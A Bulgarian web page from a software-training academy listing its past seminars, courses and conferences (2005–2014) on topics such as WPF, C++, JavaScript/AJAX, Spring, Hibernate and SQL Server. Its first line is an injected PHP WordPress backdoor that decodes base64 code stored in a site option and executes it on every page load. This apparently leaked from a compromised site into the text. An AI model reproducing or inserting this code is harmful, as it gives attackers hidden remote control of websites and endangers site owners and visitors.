add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Проведени семинари - НАРС

Семинари за софтуерни разработчици

Национална академия по разработка на софтуер провежда национални и международни конференции, семинари и обучения по разработка на софтуер, софтуерни и информационни технологии:

Професия Програмист – семинар – 27.09.2014

Професия Програмист или Разработчик на софтуер е една от най-перспективните в страната и чужбина. Тя предлага отлично заплащане и кариерно развитие.

„Как да стана програмист?” – Отговори на този въпрос получиха посетилите безплатния семинар „ Професия Програмист – Първи стъпки ”.

Той е предназначен за всеки, който има интерес да започне своето обучение и да се развива професионално.

Обучението се проведе в рамките на 6 часа и представи:

 • Професия Програмист ” (разработчик на софтуер)
 • Какви първоначални знания са необходими?
 • Има ли възрастови ограничения?
 • Подходяща ли е професия Програмист за жените?
 • Какво е заплащането на начинаещите?
 • Какво професионално развитие да очакваме след 3, 5 и т.н. години?
 • Как да изберете подходящия език за програмиране?

След представянето на професия Програмист беше презентирана атрактивната лекция – Основи на програмирането. Всички присъстващи имаха шанса да видят нов, изключително забавен начин на преподаване, да получат много награди и да научат много новости с лекота.

Безплатен семинар – Free Trainings – 11.01.2014

„Професия Програмист – Първи стъпки”
Семинарът е първият от поредицата безплатни образователни мероприятия от веригата „Free Trainings for software development” („Безплатни обучения за софтуерна разработка”). Той е предназначен за всички, които имат интерес да започнат своето обучение и да се развиват професионално като програмисти.

Обучението се проведе в рамките на 6 учебни часа и представи:

 • професията на програмиста (разработчика на софтуер)
 • каква знания са необходими за започване на работа в софтуерна компания
 • какво заплащане да очаквате
 • как да изберете подходящия за вас език за програмиране

След уводната част беше проведено начално обучение по програмиране. В края на семинара всички присъстващи имаха възможност да зададат своите въпроси и да се запишат за следващото ниво.

Практически курс по “Windows Presentation Foundation (WPF) – 3-4 юли, 10-11 юли 2008, София

Windows Presentation Foundation (WPF) е изцяло нова графична система в Microsoft Windows, която предоставя на разработчици и дизайнери обща платформа за създаване на мултимедийни приложения на основата на езика за презентация XAML. Технологията WPF е създадена за .NET платформата и обединява в себе си добрите практики на съвременните технологии за визуализация, като HTML и Flash. В настоящия курс ще ви запознаем с основите на WPF, нейните графични и презентационни възможности, езикът XAML, WPF контролите, прозорците, диалозите, свързването на данни (data binding) и други важни концепции.

Курсът е предназначен за .NET разработчици, които имат желание да навлязат в съвременните презентационни технологии на Майкрософт, както и за всички, които се интересуват от WPF и Silverlight.

Лекторът Мирослав Пасков е утвърден в индустрията специалист с богат опит като софтуерен инженер и лектор, който в последните години работи изключително с WPF и Silverlight технологиите.

C++ Conference” – 27-28 юни 2008, Велинград

“C++ Conference” – първата национална конференция за напреднали C++ разработчицисе проведе на 27 и 28-ми юни 2008 г. в Спа Клуб „Бор” – Велинград.

„С++ Conference” е част от инициативата „Free Trainings for Software Developers”, организирана от Националната Академия по Разработка на Софтуер (НАРС). Това е първото безплатно събитие, предназначено за софтуерни разработчици с професионален опит над 3 години, организирано от НАРС.

На конференцията официално бяха поканени senior C + + разработчици, които имат 3-4 години опит като C++ софтуерни инженери и най-малко 5 години опит в ИТ индустрията.

По време на събитието беше анонсирано създаването на Българската С++ потребителска група.

Сред темите, представени на конференцията бяха: Новият стандарт C++0x; Концепциите (concepts) в новия C++ като средство за разширяване на шаблоните (generic programming extension); Техники за оптимизации на производителността при C++ приложения; Техники за ефективно управление на паметта в C++; Новостите в Boost библиотеката; C++ за разработка на 3D игри; Слабите страни на C++; Разработка на C++ приложения, базирано на модели (model-driven engineering) и др.

Практически курс “JavaScript, AJAX и Web 2.06-7 декември, 13-15 декември 2007, София

Езикът JavaScript е основният двигател на модерните Web 2.0 технологии и AJAX платформи. Свидетели сме как съвременните уеб сайтовете и уеб приложения предоставят все по-богато динамично съдържание и гъвкав потребителски интерфейс и затова в днешно време уменията за програмиране на JavaScript са на практика задължителни за всеки сериозен Web разработчик, независимо от езика и платформата, с която работи (Java, .NET, PHP или Python).

Курсът “JavaScript, AJAX и Web 2.0” предоставя възможност за навлизане в дълбочина в DHTML технологиите и задълбочено овладяване на езика JavaScript. Курсистите ще имат възможност да навлязат в тайните на разработката на модерните Web 2.0 приложения, базирани на AJAX, XHTML, CSS и JavaScript. Ще бъдат разгледани широко използвани програмни библиотеки и технологии за обектно-ориентирано програмиране с JavaScript като Prototype, Dojo Toolkit и JSON сериализация. Лекторът ще сподели своя опит и добри практики за създаване на преизползваеми JavaScript компоненти, базирани на обектно-ориентирания подход и ще покаже техники за създаване на сложни rich-client JavaScript приложения с богата функционалност. Курсът завършва с практически проект, в който всеки участник ще приложи усвоените знания и умения и ще създаде модерно уеб приложение, базирано на AJAX и JavaScript.

Курсът е подходящ както за начинаещи, така и за напреднали уеб разработчици, които искат да навлязат в дълбочина в Web 2.0 и AJAX технологиите.

Лекторът Димитър Кунчев е опитен уеб разработчик и технически директор на английска софтуерна компания, която от години специализира AJAX базираните сайтове и Web 2.0 решенията. За повече информация посетете страницата на курса.

Практически курс “Управление на софтуерни проекти” – 20-23 септември в Гранд Хотел “Варна”

Курсът предоставя базови знания и умения за ефективно управление на софтуерни проекти. В него се разглеждат основните стъпки от организирането и управлението на всеки софтуерен проект: изграждане на реалистичен план на проекта, планиране на обхвата, планиране на разходите, планиране на ресурсите и времето за разработка, управление на екипа от разработчици, управление на риска, контролиране на изпълнението на проекта и управление на комуникацията и документацията. В курса е включена и практическа част: работа с инструменти за планиране и управление на проекти, конкретно продуктът Microsoft Project.

Курсът е подходящ както за начинаещи ръководители на проекти, така и за по-опитни мениджъри, които вече практикуват управление на софтуерни проекти, но имат пропуски в знанията си и търсят решения на проблеми, с които са се сблъсквали в практиката.

Лекторите Михаил Михайлов и Мая Михайлова са утвърдени в индустрията специалисти с богат опит както като софтуерни инженери, така и като дългогодишни ръководители на софтуерни проекти, сблъсквали се многократно с реални проблеми, които възникват в практиката. За повече информация посетете страницата на курса.

Практически курс “Spring Framework12-13 април и 19-20 април 2007 г. в София

Курсът запознава аудиторията с принципите на Spring Framework, популярна Java технология за изграждане на софтуерни приложения, която предлага олекотена алтернатива на Java EE платформата. Курсът е с продължителност 4 дни, разпределен в 2 последователни седмици по 2 дни и навлиза в дълбочина в концепциите на Spring Framework. През първия ден се разглеждат шаблоните “Inversion of Control (IoC), “Dependency Injection” и идеологията за програмиране през интерфейси, както и средствата на Spring, които подпомагат реализацията на този подход. През втория ден фокусът е върху принципите на аспектно-ориентираното програмиране (AOP). През третия ден се разглеждат и демонстрират средствата на Spring за достъп до данни, интеграцията му с JDBC, Hibernate, средствата за управление на транзакции и други технологии, подпомагащи програмирането на средния слой при разработка на корпоративни разпределени приложения (enterprise applications). През четвъртия ден се разглеждат и демонстрират средствата на Spring за разработка на уеб приложения (Spring Web MVC framework) и интеграцията на Spring с различни платформи за уеб приложения (Struts, WebWork, Velocity, Tapestry, JSF и други). За повече информация посетете страницата на курса.

Практически курс “Hibernate Fundamentals – 1 и 2 февруари 2007 г. в София

Курсът запознава аудиторията с принципите на обектно-релационния достъп до бази от данни (O/R mapping) чрез технологията Hibernate. Дават се практически умения за използване на Hibernate за улесняване и унифициране на достъпа до данните в големи Java проекти. Разглеждат се следните теми: инсталиране и конфигуриране на Hibernate, дефиниране на съответствия между таблици в базата данни и POJO класове, конфигуриране на първичния ключ, използване на различни видове релации (едно към много, много към много и едно към едно), както и работата с персистентни обекти (зареждане, търсене, създаване, изтриване, промяна). Обръща се внимание и на по-сложни теми като: работа с HQL заявки,  управление на транзакциите и използване на първо и второ ниво кеш. За повече информация посетете страницата на курса.

Световна конференция за Microsoft технологии DevReach – 9-10 октомври 2006 г.

Конференцията е уникална за Балканите с участието на 12 световноизвестни лектори, целогодишно анагажирани в международни форуми като TechEd, VSLive!, Microsoft PDC, DevConnections и Microsoft DevDays. Сред тях са Гокшин Бакър, Ричард Кембъл, Стивън Форте, Карл Франклин, Кати Геро, Джули Лърман, Ангъс Логан, Сахил Малик и Тед Нюард. Лекциите са над 20, разделени в 3 паралелни сесии, посветени на Microsoft SQL Server, ASP.NET и тенденциите в развитието на средствата за разработка като цяло.

Семинар “Релационни бази от данни и SQL Server 2005 – теория и практика”октомври 2006 г.

Семинарът запознава аудиторията с основите на релационните бази от данни и работата със SQL Server 2005. Обръща се внимание както на теоретичните концепции на съвременните системи за управление на релационни бази от данни, така и върху чисто практическия аспект – моделиране на релационни данни чрез E/R диаграми и работа с езиците SQL и T-SQL. Можете да изтеглите презентациите и видеозапис на лекцията от страницата на семинара.

Семинар за ИТ архитектури – 18 април 2006 г.

Семинарът е посветен на съвременните концепции за изграждане на софтуерни и ИТ архитектури при големи корпоративни решения. Специални гост лектори на събитието ще бъдат президентът на Международната асоциация на софтуерните архитекти (IASA) Поул Прайс и Джоузеф Уилямс, глобален технологичен директор в Майкрософт.

Семинар “Data Warehousing Solutions” – 10-12 февруари 2006 г.

Семинарът представя понятия и решения, използвани при проектиране и разработка на DWH. В лекциите се разглеждат темите, свързани с дизайн на БД като DWH, използване на OLAP кубове, технологии за извличане на данни, генериране на отчети и оптимизация за по-висока производителност.

Семинар за подготовка за сертификация по Java 5.0 – 10-12 февруари 2006 г.

Семинарът дава солидна подготовка и всички необходими знания за успешното преминаване на изпита за сертификация “Sun Certified Programmer for the Java 2 Platform, Standard Edition 5.0” (CX-310-055). Лекторите са сертифицирани Java 5 инструктори с дългогодишен практически опит.

Разработка на мобилни приложения – 2 и 4 декември, 2005 г.

Семинарът представя практическия аспект на разработката на мобилни приложения с .NET Compact Framework, Java 2 Micro Edition, OSGi и Oracle Wireless, както и новите направление за развитие на мобилните услуги. Лектори са водещи специалисти от софтуерната индустрия.

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad